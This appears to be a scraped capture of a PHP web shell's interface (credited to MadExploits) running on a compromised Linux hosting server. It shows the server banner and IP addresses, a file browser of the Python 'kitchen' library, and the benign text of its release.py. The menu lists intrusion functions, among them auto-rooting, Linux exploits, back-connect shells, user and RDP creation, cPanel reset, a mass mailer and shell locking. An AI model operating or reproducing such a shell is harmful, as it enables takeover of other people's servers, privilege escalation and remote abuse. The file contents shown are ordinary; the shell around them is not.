Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.217.140.224
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib /
python2.7 /
site-packages /
kitchen /
[ HOME SHELL ]
Name
Size
Permission
Action
collections
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
iterutils
[ DIR ]
drwxr-xr-x
pycompat24
[ DIR ]
drwxr-xr-x
pycompat25
[ DIR ]
drwxr-xr-x
pycompat27
[ DIR ]
drwxr-xr-x
text
[ DIR ]
drwxr-xr-x
versioning
[ DIR ]
drwxr-xr-x
__init__.py
1.34
KB
-rw-r--r--
__init__.pyc
696
B
-rw-r--r--
__init__.pyo
696
B
-rw-r--r--
exceptions.py
1.06
KB
-rw-r--r--
exceptions.pyc
666
B
-rw-r--r--
exceptions.pyo
666
B
-rw-r--r--
release.py
1.61
KB
-rw-r--r--
release.pyc
1.97
KB
-rw-r--r--
release.pyo
1.97
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : release.py
''' Information about this kitchen release. ''' from kitchen import _, __version__ NAME = 'kitchen' VERSION = __version__ DESCRIPTION = _('Kitchen contains a cornucopia of useful code') LONG_DESCRIPTION = _(''' We've all done it. In the process of writing a brand new application we've discovered that we need a little bit of code that we've invented before. Perhaps it's something to handle unicode text. Perhaps it's something to make a bit of python-2.5 code run on python-2.3. Whatever it is, it ends up being a tiny bit of code that seems too small to worry about pushing into its own module so it sits there, a part of your current project, waiting to be cut and pasted into your next project. And the next. And the next. And since that little bittybit of code proved so useful to you, it's highly likely that it proved useful to someone else as well. Useful enough that they've written it and copy and pasted it over and over into each of their new projects. Well, no longer! Kitchen aims to pull these small snippets of code into a few python modules which you can import and use within your project. No more copy and paste! Now you can let someone else maintain and release these small snippets so that you can get on with your life. ''') AUTHOR = 'Toshio Kuratomi, Seth Vidal, others' EMAIL = 'toshio@fedoraproject.org' COPYRIGHT = '2011 Red Hat, Inc. and others' URL = 'https://fedorahosted.org/kitchen' DOWNLOAD_URL = 'https://fedorahosted.org/releases/k/i/kitchen' LICENSE = 'LGPLv2+' __all__ = ('NAME', 'VERSION', 'DESCRIPTION', 'LONG_DESCRIPTION', 'AUTHOR', 'EMAIL', 'COPYRIGHT', 'URL', 'DOWNLOAD_URL', 'LICENSE')
Close